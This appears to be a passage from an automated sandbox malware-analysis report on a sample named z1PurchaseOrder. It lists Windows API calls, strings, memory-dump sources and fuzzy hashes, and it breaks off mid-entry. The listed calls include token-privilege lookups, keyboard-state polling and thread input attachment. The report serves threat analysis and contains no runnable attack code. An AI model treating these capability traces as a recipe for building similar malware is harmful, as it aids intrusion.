                                        • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                        • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: DestroyWindow
                                        • String ID: static
                                        • API String ID: 3375834691-2160076837
                                        • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                        • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                        • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                        • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                        • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                        • _memcmp.LIBCMT ref: 004394A9
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                        Strings
                                        • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                        • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                        • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                        • API String ID: 1446985595-805462909
                                        • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                        • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                        • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                        • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                        • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                        • API String ID: 2907320926-41864084
                                        • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                        • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                        • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                        • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                        APIs
                                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                        • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                          • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                          • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                          • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                        • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                        • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                          • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                        • String ID:
                                        • API String ID: 1932665248-0
                                        • Opcode ID: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                        • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                        • Opcode Fuzzy Hash: 16f99e80be173eecdd1bb573f6b7f825babaa5351af7cc3efc94bb11c862a2f8
                                        • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                        • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                        • _memset.LIBCMT ref: 004481BA
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                        • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                        • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                        • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                        • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow_memset
                                        • String ID:
                                        • API String ID: 830647256-0
                                        • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                        • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                        • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                        • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                        APIs
                                          • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                        • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                        • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                        • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                        • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                        • DeleteObject.GDI32(?), ref: 0046EB4F
                                        • DestroyIcon.USER32(?), ref: 0046EB67
                                        • DeleteObject.GDI32(?), ref: 0046EB7F
                                        • DestroyWindow.USER32(?), ref: 0046EB97
                                        • DestroyIcon.USER32(?), ref: 0046EBBF
                                        • DestroyIcon.USER32(?), ref: 0046EBCD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                        • String ID:
                                        • API String ID: 802431696-0
                                        • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                        • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                        • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                        • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                        APIs
                                        • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                        • GetKeyState.USER32(000000A0), ref: 00444E26
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                        • GetKeyState.USER32(000000A1), ref: 00444E51
                                        • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                        • GetKeyState.USER32(00000011), ref: 00444E77
                                        • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                        • GetKeyState.USER32(00000012), ref: 00444E9D
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                        • GetKeyState.USER32(0000005B), ref: 00444EC3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                        • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                        • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                        • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HH
                                        • API String ID: 0-2761332787
                                        • Opcode ID: 31ff441d28c5e927918bd04bcaff178bc0424bc9c98581a0806166e4fd3f8403
                                        • Instruction ID: 1932890218e454eaab518c2d08cf67ea4bcb6b95680f1d85a47b5a5cee1eebd3
                                        • Opcode Fuzzy Hash: 31ff441d28c5e927918bd04bcaff178bc0424bc9c98581a0806166e4fd3f8403
                                        • Instruction Fuzzy Hash: 99A1A1726043009BD710EF65DC82B6BB3E9ABD4718F008E2EF558E7281D779E9448B5A
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                        • _wcslen.LIBCMT ref: 00450944
                                        • _wcscat.LIBCMT ref: 00450955
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                        • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcscat_wcslen
                                        • String ID: -----$SysListView32
                                        • API String ID: 4008455318-3975388722
                                        • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                        • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                        • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                        • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                        APIs
                                        • _memset.LIBCMT ref: 00448625
                                        • CreateMenu.USER32 ref: 0044863C
                                        • SetMenu.USER32(?,00000000), ref: 0044864C
                                        • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                        • IsMenu.USER32(?), ref: 004486EB
                                        • CreatePopupMenu.USER32 ref: 004486F5
                                        • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                        • DrawMenuBar.USER32 ref: 00448742
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                        • String ID: 0
                                        • API String ID: 176399719-4108050209
                                        • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                        • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                        • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                        • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                        • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                        • GetParent.USER32 ref: 004692A4
                                        • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                        • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                        • GetParent.USER32 ref: 004692C7
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 2040099840-1403004172
                                        • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                        • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                        • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                        • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                        APIs
                                          • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                        • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                        • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                        • GetParent.USER32 ref: 0046949E
                                        • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                        • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                        • GetParent.USER32 ref: 004694C1
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 2040099840-1403004172
                                        • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                        • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                        • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                        • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                        APIs
                                          • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                        • SendMessageW.USER32(75C123D0,00001001,00000000,00000000), ref: 00448E73
                                        • SendMessageW.USER32(75C123D0,00001026,00000000,00000000), ref: 00448E7E
                                          • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                        • String ID:
                                        • API String ID: 3771399671-0
                                        • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                        • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                        • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                        • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: InitVariant$_malloc_wcscpy_wcslen
                                        • String ID:
                                        • API String ID: 3413494760-0
                                        • Opcode ID: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                        • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                        • Opcode Fuzzy Hash: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                        • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                        • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1695789435.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1695742277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695865433.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695906377.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1695983529.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_z1PurchaseOrder.jbxd
                                        Similarity
                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                        • String ID:
                                        • API String ID: 2156557900-0
                                        • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                        • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
